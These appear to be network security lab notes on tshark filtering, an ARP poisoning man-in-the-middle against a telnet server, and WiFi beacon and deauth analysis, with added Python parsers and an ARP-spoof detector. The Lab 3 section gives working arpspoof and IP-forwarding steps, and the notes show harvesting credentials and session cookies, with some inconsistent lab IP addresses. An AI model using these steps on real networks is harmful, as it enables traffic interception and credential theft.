🔬 Tshark, ARP, WiFi
Lab 1
Tshark usage
tshark -v
TShark (Wireshark) 2.6.1 (Git v2.6.1 packaged as 2.6.1-0ubuntu2~16.04.0)
📌 The running Tshark version is 2.6.1
tshark -D
Lists all network interfaces available for capturing

Sniff some traffic on eth0
tshark -i eth0

📌 The student user does not have permission to capture on the eth0 interface
Display the packet list of the .pcap file
tshark -r HTTP_traffic.pcap
Count the output lines (one per packet) to find the total number of packets in the .pcap file
tshark -r HTTP_traffic.pcap | wc -l
30418 # lines in the file

Read the first 100 packets from the .pcap file
tshark -r HTTP_traffic.pcap -c 100
List the Protocol Hierarchy Statistics from the .pcap file
tshark -r HTTP_traffic.pcap -z io,phs -q

Lab 2
Tshark usage and filtering
Filtering
Show the HTTP traffic from a .pcap file
tshark -r HTTP_traffic.pcap -Y 'http'
tshark -r HTTP_traffic.pcap -Y 'http' | more

Show only the IP packets sent from IP address 192.168.252.128 to IP address 52.32.74.91
tshark -r HTTP_traffic.pcap -Y "ip.src==192.168.252.128 && ip.dst==52.32.74.91"

Print only packets containing GET requests
tshark -r HTTP_traffic.pcap -Y "http.request.method==GET"

Print only packets with frame time, source IP and URL for all GET requests
tshark -r HTTP_traffic.pcap -Y "http.request.method==GET" -Tfields -e frame.time -e ip.src -e http.request.full_uri

Print packets containing a string
tshark -r HTTP_traffic.pcap -Y "http contains password"

📌 4 HTTP packets contain the password string
Check the destination IP for GET requests sent to www.nytimes.com
tshark -r HTTP_traffic.pcap -Y "http.request.method==GET && http.host==www.nytimes.com" -Tfields -e ip.dst

📌 170.149.159.130 is the destination IP of www.nytimes.com
Check the session ID used by 192.168.252.128 for amazon.in
tshark -r HTTP_traffic.pcap -Y "ip contains amazon.in && ip.src==192.168.252.128" -Tfields -e ip.src -e http.cookie

📌 278-7381968-4337153 is the session ID
Find the OS type on the machine with IP 192.168.252.128
tshark -r HTTP_traffic.pcap -Y "ip.src==192.168.252.128 && http" -Tfields -e http.user_agent

Use the User-Agent string to find the specific distribution
Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
📌 The OS is Linux x86_64; rv:31.0 - user-agents.net
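Added example, not part of the lab notes: a small Python parser for the tab-separated output that tshark -T fields produces, run over constructed sample lines, flagging requests that send credentials or session cookies over plain HTTP and pulling a cookie value out the way the amazon.in step does. The hosts login.example.test and cdn.example.test, the cookie names and the query values are assumptions made up for the sample.

```python
"""Parse `tshark -T fields` output (tab-separated, one packet per line) and flag
cleartext HTTP requests that expose credentials or session cookies."""
import re

# Field order must match the -e options given to tshark.
FIELDS = ["ip.src", "http.host", "http.request.method",
          "http.request.full_uri", "http.cookie"]
SENSITIVE = re.compile(r"\b(pass(word|wd)?|pwd|session[-_]?id|token)=", re.I)

# Constructed sample of:
#   tshark -r HTTP_traffic.pcap -Y "http.request" -T fields \
#     -e ip.src -e http.host -e http.request.method -e http.request.full_uri -e http.cookie
# Hosts other than the lab's, cookie names and query values are made up.
SAMPLE = "\n".join([
    "192.168.252.128\twww.nytimes.com\tGET\thttp://www.nytimes.com/\t",
    "192.168.252.128\tamazon.in\tGET\thttp://amazon.in/gp/cart\t"
    "session-id=278-7381968-4337153; ubid-main=130-0000000-0000000",
    "192.168.252.128\tlogin.example.test\tGET\t"
    "http://login.example.test/auth?user=bob&password=hunter2\t",
    "192.168.252.131\tcdn.example.test\tGET\thttp://cdn.example.test/logo.png\t",
])

def parse_fields(text, fields=FIELDS):
    """Turn each output line into a dict keyed by field name."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        values = line.split("\t")
        values += [""] * (len(fields) - len(values))  # tolerate a missing last column
        rows.append(dict(zip(fields, values)))
    return rows

def cookie_value(cookie_header, name):
    """Extract one cookie from a 'k=v; k2=v2' Cookie header, or None if absent."""
    for part in cookie_header.split(";"):
        k, _, v = part.strip().partition("=")
        if k == name:
            return v
    return None

def find_exposures(rows):
    """(src, host, where) for each request sending sensitive data over plain HTTP."""
    hits = []
    for r in rows:
        if SENSITIVE.search(r["http.request.full_uri"]):
            hits.append((r["ip.src"], r["http.host"], "uri"))
        if SENSITIVE.search(r["http.cookie"]):
            hits.append((r["ip.src"], r["http.host"], "cookie"))
    return hits

if __name__ == "__main__":
    rows = parse_fields(SAMPLE)
    print(find_exposures(rows))
    print(cookie_value(rows[1]["http.cookie"], "session-id"))
```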
Lab 3 - ARP Poisoning
🔬 INE Platform Lab
ARP Poisoning attack against a telnet server. The client machine authenticates with the telnet server every 30 sec. Find the telnet login credentials.
Tools: arpspoof & Wireshark
Monitor the traffic on the eth1 interface of the Kali Attacker machine.
ip -br -c a
eth1 UP 10.100.13.140/24
Enumeration
nmap 10.100.13.0/24
Nmap scan report for 10.100.13.1
22/tcp open ssh
3389/tcp open ms-wbt-server
# ^^ Gateway machine, do not attack
Nmap scan report for 10.100.13.36
22/tcp open ssh
23/tcp open telnet
# ^^ Telnet server machine
Nmap scan report for 10.100.13.140
3389/tcp open ms-wbt-server
5910/tcp open cm
# ^^ Client machine

ARP Poisoning Attack
To see traffic of other machines, configure Kali Attacker VM to forward IP packets
echo 1 > /proc/sys/net/ipv4/ip_forward
Start the ARP poisoning attack with the arpspoof tool
arpspoof -i eth1 -t 10.100.13.37 -r 10.100.13.36
# -t = target
# -r = host
Open Wireshark and start capturing eth1 traffic. Apply the telnet filter

Follow the TCP stream and find the telnet credentials. Stop the capture and the arpspoof tool

📌 Telnet credentials are admin:MyS3cr3tP455
telnet 10.100.13.36
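Added example from the defender's side, not part of the lab: the poisoning above shows up in the ARP replies themselves, so this Python snippet reads tshark -T fields output of ARP replies (constructed sample, MAC addresses are placeholders, IPs are the lab's telnet server .36 and arpspoof target .37) and reports two signals: one IP answered for by two different MACs, and one MAC answering for several IPs, which is what poisoning both ends of a conversation looks like.

```python
"""Detect ARP cache poisoning from `tshark -T fields` output of ARP replies."""
from collections import defaultdict

FIELDS = ["frame.time_relative", "arp.src.proto_ipv4", "arp.src.hw_mac"]

# Constructed sample of:
#   tshark -i eth1 -Y "arp.opcode==2" -T fields \
#     -e frame.time_relative -e arp.src.proto_ipv4 -e arp.src.hw_mac
# All MAC addresses are placeholders; 00:0c:29:aa:bb:cc plays the poisoning host.
SAMPLE = "\n".join([
    "0.000\t10.100.13.36\t00:50:56:36:36:36",
    "0.004\t10.100.13.37\t00:50:56:37:37:37",
    "2.100\t10.100.13.36\t00:0c:29:aa:bb:cc",
    "2.101\t10.100.13.37\t00:0c:29:aa:bb:cc",
    "4.100\t10.100.13.36\t00:0c:29:aa:bb:cc",
    "4.101\t10.100.13.37\t00:0c:29:aa:bb:cc",
    "9.000\t10.100.13.1\t00:50:56:01:01:01",
])

def parse_arp_replies(text):
    """One dict per ARP reply, keyed by field name."""
    return [dict(zip(FIELDS, line.split("\t")))
            for line in text.splitlines() if line.strip()]

def ip_mac_conflicts(rows):
    """IPs claimed by more than one MAC -> {ip: sorted MAC list}."""
    seen = defaultdict(set)
    for r in rows:
        seen[r["arp.src.proto_ipv4"]].add(r["arp.src.hw_mac"])
    return {ip: sorted(macs) for ip, macs in seen.items() if len(macs) > 1}

def macs_claiming_many_ips(rows, threshold=2):
    """MACs answering for at least `threshold` distinct IPs -> {mac: sorted IP list}."""
    seen = defaultdict(set)
    for r in rows:
        seen[r["arp.src.hw_mac"]].add(r["arp.src.proto_ipv4"])
    return {mac: sorted(ips) for mac, ips in seen.items() if len(ips) >= threshold}

def first_change(rows):
    """(time, ip, old_mac, new_mac) of the first reply contradicting an earlier binding."""
    binding = {}
    for r in rows:
        ip, mac = r["arp.src.proto_ipv4"], r["arp.src.hw_mac"]
        if ip in binding and binding[ip] != mac:
            return float(r["frame.time_relative"]), ip, binding[ip], mac
        binding.setdefault(ip, mac)
    return None
```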

Lab 4 - WiFi Traffic Analysis
🔬 WiFi Security: Traffic Analysis I
WiFi basic traffic analysis with Wireshark
Find the name of the Open SSID in the packet dump, using the filter below.
Beacon frame = 0x0008
Wlan tag 48 = RSN-IE (Robust Security Network Information Element)
(wlan.fc.type_subtype == 0x0008) && (!(wlan.wfa.ie.wpa.version == 1)) && !(wlan.tag.number == 48)

Find the channel Home_Network is operating on
wlan contains Home_Network

Find which security mechanism the LazyArtists SSID uses
wlan contains LazyArtists

Check the WPS setup for the Amazon Wood SSID
(wlan.ssid contains "Amazon") && (wlan.fc.type_subtype == 0x0008)
📌 WPS is enabled

Count the packets of the device with MAC e8:de:27:16:87:18
wlan.ta = transmitter address
wlan.ra = receiver address
(wlan.ta == e8:de:27:16:87:18) || (wlan.ra == e8:de:27:16:87:18)

Find a specific MAC address which exchanges data with the SecurityTube_Open SSID. SecurityTube_Open is hosted on BSSID e8:de:27:16:87:18
(wlan.bssid == e8:de:27:16:87:18) && (wlan.fc.type_subtype == 0x0020)

Find the TSF timestamp of the Association Response sent from the SecurityTube_Open access point to a station
((wlan.bssid == e8:de:27:16:87:18) && (wlan.addr==5c:51:88:31:a0:3b)) && (wlan.fc.type_subtype == 0x0001)

Lab 5 - WiFi Traffic Filtering
Tshark usage and filtering
Show only WiFi traffic
tshark -r WiFi_traffic.pcap -Y "wlan"

Show only the deauthentication packets
Every management frame in WiFi can be classified by a type and subtype
wlan.fc.type_subtype == 0x000c - deauthentication frames, sent by the AP
tshark -r WiFi_traffic.pcap -Y "wlan.fc.type_subtype==0x000c"

Show only the WPA handshake packets. EAPoL (Extensible Authentication Protocol over LAN) is used for the WPA handshake
tshark -r WiFi_traffic.pcap -Y "eapol"

Show only SSID and BSSID values of all beacon frames
tshark -r WiFi_traffic.pcap -Y "wlan.fc.type_subtype==8" -Tfields -e wlan.ssid -e wlan.bssid

Check the BSSID of the LazyArtists SSID
tshark -r WiFi_traffic.pcap -Y "wlan.ssid==LazyArtists" -Tfields -e wlan.bssid

📌 LazyArtists BSSID is fc:b0:c4:91:71:e0.
Show the channel on which Home_Network operates
tshark -r WiFi_traffic.pcap -Y "wlan.ssid==Home_Network" -Tfields -e wlan_radio.channel

📌 Home_Network operating channel is 6.
Show the two devices that received the deauth messages
tshark -r WiFi_traffic.pcap -Y "wlan.fc.type_subtype==0x000c" -Tfields -e wlan.ra

📌 The MAC addresses of the two devices are 6c:19:8f:5f:81:74 and bc:ae:c5:c3:5e:01.
Check vendor and model of the device with MAC 5c:51:88:31:a0:3b
tshark -r WiFi_traffic.pcap -Y "wlan.ta==5c:51:88:31:a0:3b && http" -Tfields -e http.user_agent

📌 The device is a Motorola MotoG3.
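Added example serving both Lab 4 and Lab 5, not part of the lab notes: Python code that mirrors the Open-SSID beacon filter from Lab 4 (no RSN IE tag 48 and no WPA IE version 1 means open) on tshark -T fields output of beacon frames, and counts the Lab 5 deauthentication frames per receiver. SSIDs, BSSIDs, the Home_Network channel and the deauth receivers follow the notes; the tag lists, the Home_Network BSSID, the LazyArtists and Home_Network security and the channels other than 6 are constructed assumptions.

```python
"""Classify beacon frames by security mechanism and count deauthentication
frames per receiver, from `tshark -T fields` output."""
from collections import Counter

# Constructed sample of:
#   tshark -r WiFi_traffic.pcap -Y "wlan.fc.type_subtype==8" -T fields \
#     -e wlan.ssid -e wlan.bssid -e wlan_radio.channel -e wlan.tag.number -e wlan.wfa.ie.wpa.version
# Tag lists, the Home_Network BSSID and the non-6 channels are made up for the example.
BEACONS = "\n".join([
    "SecurityTube_Open\te8:de:27:16:87:18\t1\t0,1,3,5,42,50,221\t",
    "Home_Network\t00:11:22:33:44:55\t6\t0,1,3,5,221\t1",
    "LazyArtists\tfc:b0:c4:91:71:e0\t11\t0,1,3,5,48,221\t",
    "LazyArtists\tfc:b0:c4:91:71:e0\t11\t0,1,3,5,48,221\t",
])
# Constructed sample of:
#   tshark -r WiFi_traffic.pcap -Y "wlan.fc.type_subtype==0x000c" -T fields -e wlan.ta -e wlan.ra
DEAUTHS = "\n".join([
    "fc:b0:c4:91:71:e0\t6c:19:8f:5f:81:74",
    "fc:b0:c4:91:71:e0\tbc:ae:c5:c3:5e:01",
    "fc:b0:c4:91:71:e0\t6c:19:8f:5f:81:74",
])

def security_of(tag_numbers, wpa_version):
    """Same logic as the Wireshark filter: RSN IE (tag 48) -> WPA2, WPA IE v1 -> WPA, else Open."""
    tags = {t for t in tag_numbers.split(",") if t}
    if "48" in tags:
        return "WPA2/RSN"
    if wpa_version == "1":
        return "WPA"
    return "Open"

def classify_beacons(text):
    """{ssid: (bssid, channel, security)} with one entry per SSID (beacons repeat)."""
    nets = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        ssid, bssid, channel, tags, wpa = (line.split("\t") + [""] * 5)[:5]
        nets[ssid] = (bssid, int(channel), security_of(tags, wpa))
    return nets

def open_ssids(nets):
    """SSIDs with neither RSN nor WPA IE, i.e. what the Lab 4 beacon filter lists."""
    return sorted(s for s, (_, _, sec) in nets.items() if sec == "Open")

def deauths_per_receiver(text):
    """Counter of receiver MAC (wlan.ra) -> number of deauth frames addressed to it."""
    return Counter(line.split("\t")[1] for line in text.splitlines() if line.strip())
```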